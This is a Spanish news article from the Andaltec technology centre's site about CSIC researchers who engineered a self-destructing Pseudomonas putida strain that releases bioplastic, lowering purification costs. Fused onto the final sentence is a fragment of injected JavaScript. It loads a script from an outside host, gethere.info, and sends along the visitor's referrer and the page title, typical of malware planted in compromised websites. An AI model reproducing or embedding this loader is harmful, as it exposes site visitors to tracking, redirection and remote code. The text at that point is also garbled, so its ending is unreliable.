Andaltec
Copyright Andaltec
Desarrollan un sistema de bacterias capaces de autodestruirse y liberar el bioplástico producido en su interior - Andaltec
Andaltec es un centro tecnológico especializado en sistemas de iluminación para automoción, plásticos en contacto con alimentos, prototipado y materiales.
plástico, iluminación, automoción, automóvil, envase, alimentario, ensayo, migración, enac, prototipo, ingeniería, faro, proyector, piloto, material, polímero, pintura, impresión, 3d, simulación, óptica, robot, formación, cad, proyecto, centro, tecnológico, innovación, martos, andalucía, I D I, led
7
post-template-default,single,single-post,postid-7,single-format-standard,bridge-core-1.0,ajax_fade,page_not_loaded,,qode_grid_1300,side_area_uncovered_from_content,footer_responsive_adv,qode-content-sidebar-responsive,qode-theme-ver-10.1,wpb-js-composer js-comp-ver-6.10.0,vc_responsive
 

Desarrollan un sistema de bacterias capaces de autodestruirse y liberar el bioplástico producido en su interior

Desarrollan un sistema de bacterias capaces de autodestruirse y liberar el bioplástico producido en su interior

Científicos españoles adscritos al Proyecto Consolider Ingenio 2010 han desarrollado un nuevo sistema de producción de bioplásticos bacterianos que podría reducir hasta un 30% el coste de producción a escala industrial. La investigación ha sido dirigida por la doctora María Auxiliadora Prieto del Centro de Investigaciones Biológicas, órgano dependiente del Consejo Superior de Investigaciones Científica (CSIC).

Estos científicos han desarrollado un sistema basado en bacterias capaces de autodestruirse y liberar el bioplástico producido en su interior. Reducción del coste energético, menor impacto medioambiental y disminución del uso de disolventes contaminantes durante el proceso de purificación del producto son algunas de las ventajas del nuevo sistema. Los nuevos bioplásticos pueden modificarse en su estructura química después de ser producidos por las bacterias.

Los problemas de contaminación medioambiental que está generando el uso de los plásticos convencionales han provocado un enorme interés en el estudio e implantación de procesos sostenibles que permitan producir nuevos materiales plásticos generados a partir de residuos de origen agrícola, industrial o urbano. La producción biotecnológica de materiales plásticos de origen bacteriano (bioplásticos) es una de las alternativas que se están considerando para reducir la dependencia del petróleo por parte de la industria de los plásticos, provocando una disminución de los residuos sólidos y una reducción de la emisión de gases que provocan el efecto invernadero.

Con este punto de partida y tras varios meses de investigación, el equipo de la doctora Prieto en colaboración con la Estación Experimental del Zaidín del CSIC, ha generado una cepa recombinante de la bacteria Pseudomonas putida capaz de autodestruirse y liberar de forma controlada el bioplástico acumulado en su interior, lo que facilita el proceso de purificación del material a escala industrial. De hecho, con este nuevo procedimiento se podría abaratar hasta un 30% el coste de extracción del plástico al reducir el uso de grandes cantidades de disolventes orgánicos contaminantes, cócteles enzimáticos o detergentes, ya que son las propias bacterias las que facilitan la extracción del bioplástico.

La investigación ha generado una patente que ha sido licenciada por la empresa española Biopolis S.L., especializada en biotecnología microbiana, que desarrolla procesos para la obtención de microorganismos y compuestos producidos por estos, como nuevos enzimas, compuestos bioactivos o bioplásticos.

Asimismo, y como parte de este proyecto, el grupo de la doctora Prieto está generando bioplásticos de segunda generación, que pueden ser modificados en su estructura química después de ser producidos por las bacterias. Esta peculiaridad permite que el bioplástico adquiera las propiedades necesarias para generar un producto en concreto como el color, la elasticidad, o la resistencia, entre otras. Con esta nueva aportación, la investigación ha incrementado el valor añadido de esta tecnología de biomateriales haciéndolos más competitivos para su comercialización.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;